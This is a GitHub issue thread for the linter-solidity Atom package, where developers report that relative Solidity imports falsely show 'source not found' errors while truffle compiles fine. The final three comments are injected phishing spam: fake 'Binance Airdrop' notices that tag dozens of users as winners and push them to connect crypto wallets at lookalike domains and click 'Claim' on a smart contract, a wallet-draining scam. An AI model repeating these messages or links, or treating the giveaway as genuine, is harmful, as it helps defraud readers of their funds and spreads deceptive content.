### ISSUE TITLE
Source file not found during import

### ISSUE THREAD

**Issue by Moejoe90** [Latrasis/linter-solidity#10]
There is an issue with backward assignments for example, 
import '/home/moe/Desktop/Etherium/smallproject/contracts/Acount.sol'; passes ok
and
import '../contracts/MetaCoin.sol returns a file not found error. 

Take into account when compiled using truffle for example everything compiles and the files are found.

**Comment by ta20170412** [comment]
Can confirm.

**Comment by Latrasis** [comment]
Not sure how this could be handled, looks like a `solc` argument.

**Comment by yarrumretep** [comment]
This shows up in the Atom integration with `import "./SomeContract.sol"`  File is there, truffle is fine with it, but red squiggly line in Atom.

**Comment by haydenadams** [comment]
`There is an issue with backward assignments for example,
import '/home/moe/Desktop/Etherium/smallproject/contracts/Acount.sol'; passes ok
and
import '../contracts/MetaCoin.sol returns a file not found error.

Take into account when compiled using truffle for example everything compiles and the files are found.`

Still getting this issue.

**Comment by gzss666** [comment]
I'm getting the same error.
import "zeppelin-solidity/contracts/token/ERC20/StandardToken.sol"; source not found error
can not found node_modules listfile

**Comment by haydenadams** [comment]
Yeah sadly imports have been incorrectly showing error messages for a long time. The only way to prevent it is by only importing from files in the same folder or a child folder. 

Seems this repo is fairly inactive, so not sure when we can get a fix.

**Comment by Latrasis** [comment]
@haydenadams Sorry about that, I've had my hands full lately. I'll try to fix what I can. 

I stopped using Atom for VS Code, so I'll have to reinstall Atom again.

**Comment by haydenadams** [comment]
@Latrasis  No worries! That would be great though. The one issue aside, the linter works really nicely and is super useful.

**Comment by steven-sosebee** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://link.binancerewards.online/T4wOMA)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://link.binancerewards.online/T4wOMA) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @xunzhang, @pc3b3r, @llifezou, @Gnotil, @corydickson, @specter25, @louyan, @ZoMinster, @zachdt123, @hoangvu52325, @kn9ts, @Reecon, @fomsun, @hdzsj2010, @Jangmin-Lee, @codyx, @fabriciorsf, @leos-code, @NoiseySignal, @MohamedAzyzChayeb, @skyh24, @flowerett, @f1tz, @pofulu, @jletey, @chenyixuan1923, @ofofofofo, @italoag, @anyshy, @ndonkoHenri, @statebait, @Wickedlilang3l, @huan220, @OliverGilan, @darrengarvey, @shijemGG, @0xm0, @mgl, @phoorichet, @Prankurvats, @xiongmaofeifei666, @AnthonyAltieri, @passvtincomr, @Limius, @Shonminh, @knjf, @marwanhilmi, @polk6, @SagarGaniga, @gauravssnl

**Comment by YuriyEmpty** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @mositori, @gknorman, @hrnkoji, @ransbymich, @jigar23, @attackgithub, @q-uint

**Comment by softgetix** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @thibistaken, @reinhack, @happydev0105, @zabhi, @s3nt3, @seiyap70, @karamotchev
